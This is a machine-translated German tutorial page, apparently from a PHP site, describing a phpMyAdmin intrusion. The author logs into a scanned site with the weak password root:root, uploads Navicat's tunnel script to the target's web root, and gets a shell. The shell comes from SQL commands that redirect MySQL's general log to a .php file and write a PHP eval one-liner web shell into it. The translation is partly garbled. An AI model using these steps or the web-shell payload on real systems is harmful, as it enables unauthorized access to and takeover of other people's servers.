Heim > Datenbank > phpMyAdmin > Hauptteil

Teilen Sie einen Penetrationstest von Phpmyadmin

藏色散人
Freigeben: 2021-03-12 11:55:22
nach vorne
3094 Leute haben es durchsucht

Das Folgende ist ein Penetrationstest von Phpmyadmin aus der Tutorial-Kolumne von phpmyadmin. Ich hoffe, er wird Freunden in Not helfen!

Scannen Sie zunächst eine bestimmte Site durch Verzeichnis-Scanning und stellen Sie fest, dass phpmyadmin vorhanden ist. Versuchen Sie es mit dem schwachen Passwort root: Root hat Glück, hereinzukommen.

Der Versuch, Navicate für die Datenbankverbindung zu verwenden, gibt an, dass die Remoteverbindung zur Datenbank verboten ist :?? Datenbank) im Navicat-Installationsverzeichnis in ein beliebiges Website-Verzeichnis des Zielservers (später nach getshell hochgeladen)

Hochgeladen in das Verzeichnis D:/phpStudy/WWW, um auf http://XXX/ntunnel_mysql.php zuzugreifen Der Test war erfolgreich

Testverbindung: (Öffnen Sie zu diesem Zeitpunkt Navicat lokal und konfigurieren Sie die http-Verbindung. Die Kanaladresse hier ist die URL, die Sie oben besucht haben. Um es klar auszudrücken: Es handelt sich um einen Proxy. Aktivieren Sie das Kontrollkästchen, um die Base64-Kodierung zu verwenden, um zu verhindern, dass WAF Probleme verursacht. Geben Sie dann localhost als Hostnamen und das Kontokennwort ein. Das Konto des lokalen Datenbankbenutzers von lnmp01 reicht aus, da Sie eine Verbindung zum lokalen MySQL von lnmp01 herstellen müssen )

Phpmyadmin Get Shell:

Verwenden Sie die Protokolldatei

MySQL Version 5.0 und höher erstellt eine Protokolldatei und ändert die globale Protokolldatei. Variablen können auch mit getshell verwendet werden. Sie müssen aber auch über Lese- und Schreibberechtigungen für die generierten Protokolle verfügen.

set global general_log = "ON";   #当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #对应就会生成test1234.php文件
select &#39;<?php eval($_POST[2019]);?>&#39;;          #将一句话木马写入test1234.php文件
Nach dem Login kopieren

Das obige ist der detaillierte Inhalt vonTeilen Sie einen Penetrationstest von Phpmyadmin. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:cnblogs.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage